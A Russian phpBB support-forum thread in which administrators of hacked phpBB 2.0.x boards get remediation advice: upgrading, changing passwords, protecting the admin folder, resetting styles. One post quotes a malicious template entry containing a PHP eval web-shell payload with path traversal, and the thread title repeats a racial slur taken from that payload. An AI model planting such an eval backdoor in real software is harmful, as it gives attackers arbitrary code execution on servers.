Уважаемые пользователи!
Напоминаем, что с 7 ноября 2020 года phpBB Group прекратила выпуск обновлений для phpBB версии 3.2.
С учетом этого, рекомендуется обновить конференции до версии 3.3.
Сайт официальной русской поддержки phpBB Guru продолжит поддержку phpBB 3.2 до отдельного объявления.

Взлом форума - NIGGA

Темы по наиболее часто задаваемым вопросам по phpBB 2.0.x. Читать в первую очередь!
Аватара пользователя
Барминовский
phpBB 1.0.0
Сообщения: 2
Стаж: 17 лет 4 месяца

Взлом форума - NIGGA

Сообщение Барминовский »

Здравствуйте! У меня такая проблема. Сегодня мой форум был 2 раза взломан. Я в расстерянности.
Пользователь некто P06uH30H после того, как зарегистрировался "убил" все форумы. Мой форум находится здесь http://studio-77.hut1.ru/phpBB2/
Вот, что он мне написал, после того, как я заново установил форум:http://studio-77.hut1.ru/phpBB2/viewtopic.php?t=2
Как мне защитить форум от взлома?
newest

Сообщение newest »

версия форума?
когда вы его проапгрейдили?
а пароли поменяли?
Аватара пользователя
Барминовский
phpBB 1.0.0
Сообщения: 2
Стаж: 17 лет 4 месяца

Сообщение Барминовский »

newest писал(а):версия форума?
когда вы его проапгрейдили?
phpBB-2.0.13
апгрейд часов пять назад зделал.
newest писал(а):а пароли поменяли?
пароли - нет :?
newest

Сообщение newest »

Барминовский писал(а):пароли - нет
ну поэтому он вас и ломает.. хоть 10 раз проапгрейдитесь.. пароли надо менять.. тогда он не сможет ничего сделать..

поменяйте пароли.. установите форум.. спите спокойно..
Аватара пользователя
Егор Наклоняев
phpBB 2.0.4
Сообщения: 404
Стаж: 17 лет 9 месяцев
Откуда: оттуда

Сообщение Егор Наклоняев »

Барминовский
Ну и админку закройте с помощью .htaccess. Тема уже здесь обсуждалась. Поиск по ключевому слову htaccess
Учим матчасть:
http://phpbbguru.net/community/viewtopic.php?t=2061
Kevin
phpBB 1.0.0
Сообщения: 5
Стаж: 17 лет 7 месяцев

Сообщение Kevin »

У меня тоже неделю назад взломали форум,
но у меня сначало сложилось впечатление,
что вскрыли админский пароль, потому как
просто грохнули все форумы и категории со
всеми сообщениями :(

Версия была 2.0.11

Покопав БД обнаружил новый шаблон(стиль) с заголовком:

Код: Выделить всё

aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp
Что случилось, как форум был взломан?

PS. Склоняюсь к мысле сменить движек форума...
Аватара пользователя
crash
Former team member
Сообщения: 6517
Стаж: 18 лет 1 месяц
Откуда: Бердск

Сообщение crash »

Kevin
просто предохраняться надо.. уже месяц всем кричат "обновите версию форума до последней (конкретно это было залатано в 2.0.13) ... но мы все крутые и думаем, а чего мой форум то ломать...

Kevin писал(а):PS. Склоняюсь к мысле сменить движек форума...
при вашем отношении к безопасности это ни к чему не приведет
Как правильно задавать вопросы
Для особо одаренных: поиск - это есть круто.
FAQ v.2 | FAQ v.3 | Шаблон запроса
Аватара пользователя
Vladson
Former team member
Сообщения: 816
Стаж: 18 лет 3 месяца
Откуда: Estonia, Tallinn

Сообщение Vladson »

Kevin писал(а):Покопав БД обнаружил новый шаблон(стиль) с заголовком
Это кто-то "сплойт" (который позволяет выполнять произвольные комманды на серавере) но воспользоваться им можно только имея админские прова, избавиться от этого просто, надо удалить этот стиль, затем обновить версию до последней (конкретно это было залатано в 2.0.13), затем сменить все админские пароли (желательно одновременно)

Добавлено спустя 59 секунд:

доп-инфо - http://www.securitylab.ru/53295.html
Серый цвет - светлый (светлее чёрного), но он и тёмный (темнее белого), он же промежуточный (между чёрным и белым). Теорию относительности никто не отменял. Истина в целом - понятие виртуально-ситуативное.
Аватара пользователя
avm
Former team member
Сообщения: 582
Стаж: 17 лет 7 месяцев
Откуда: Москва

Сообщение avm »

Барминовский, вы кстати не забыли сменить пароль доступа к БД? Он указывается в config.php, а то раньше у вас была ситуация - в первом форуме одна тема и в ней два сообщения (ваше и его), а счетчик сообщений на титульной странице показывал 0 (при этом судя по подписи внизу у вас стоял уже 2.0.13). Это говорит о том, что скорее всего у этого хацкера есть прямой доступ к вашей БД...
выделенный сервер по цене обычного хостинга - менее 150 рублей в месяц
Благодарности принимаются в Яндекс.Деньгах на счет 4100143316948
Аватара пользователя
Егор Наклоняев
phpBB 2.0.4
Сообщения: 404
Стаж: 17 лет 9 месяцев
Откуда: оттуда

Сообщение Егор Наклоняев »

Барминовский
1. Перестать биться в истерике.
2. Если есть аська и АйПи начинать давить на психику. Учтите, взлом форума квалифицируется по статье 273 п.1 УК РФ (до 3х лет). Правда, 14 летние дети неподсудны по этой статье, но это не обязательно афишировать. Все эти юные кулхацкеры храбры, пока их не ткнешь носом аки кутёнка. Скорее всего, дитё даже не умеет пользоваться анонимными прокси.
3. Файл .htaccess создайтся в любом текстовом редакторе. Либо обратитесь к хостеру, чтобы закрыл каталог admin паролем. Это можно сделать в конфигурации сервера.
sPaG

Сообщение sPaG »

Поломали меня...

а вернуть старые настроки что бы по дефалту был субсильвер стиль никак нельзя?
L@SS@RD

Сообщение L@SS@RD »

sPaG можно.
Если у вас есть доступ к phpMyAdmin'у на сервере.
Вам нужна таблица: phpbb_config
Нужно изменить 2 поля:
1. override_user_style
значение изменить на "1" (без кавычек)
2. default_style
заменить тоже на "1", так как сабСильвер по умолчанию первым стоит, если не так, то измените на другой.
andreysmorya
phpBB 1.2.1
Сообщения: 24
Стаж: 17 лет 5 месяцев
Откуда: Геленджик

после неудачной установки стиля

Сообщение andreysmorya »

"Если у вас есть доступ к phpMyAdmin'у на сервере "
Поясните пожалуйста подробно - пошагово где "это" искать - править.
Последний раз редактировалось andreysmorya 05.01.2006 9:15, всего редактировалось 1 раз.
L@SS@RD

Сообщение L@SS@RD »

andreysmorya, это приложение(набор скриптов) на вашем сервере, позволяющее управлять базами данных.
Если хостинг платный, то 99.9% что он должен быть установлен, смотрите в контрольной панели управления сайтом.
Если хостинг бесплатный, то вроятность присутствия пхпМайАдмина снижается.

Можно спросить у службы поддержки его местонахождение.

phpMyAdmin имеет интуитивно понятный интерфейс. Слева фрейм со списком имеющихся у вас баз данных, справа дополнительная информация, а при выборе БД, то её содержимое, т.е. таблицы.

Когда вы в левом фрейме выберите свою БД, ту, которую использует ваш форум (можно посмотреть в конфиге, если забыли), - справа появятся её таблицы.
Как я уже писал выше, вам необходимо выбрать таблицу phpbb_config
Открыть её на просмотр, напротив от таблицы есть кнопочки, выбирайте "Обзор".
Откроется содержмое данной таблицы.(учтите, содержимое находится на нескольких страницах) Далее ищете поля с названиями override_user_style и default_style. И тому и другому полю нужно присвоить значение "1".
Чтобы редактировать какое-либо поле, слева от него существует кнопочка "Правка".

Если что не ясно, пишите.
andreysmorya
phpBB 1.2.1
Сообщения: 24
Стаж: 17 лет 5 месяцев
Откуда: Геленджик

стиль

Сообщение andreysmorya »

L@SS@RD, спасибо, хостинг платный, только как и везде оперативные ответы от них на стадии "приема оплаты" :) далее "не беспокойте нас по пустякам" попробую разобраться...
Последний раз редактировалось andreysmorya 05.01.2006 9:16, всего редактировалось 1 раз.

Вернуться в «FAQ (phpBB 2.0.x)»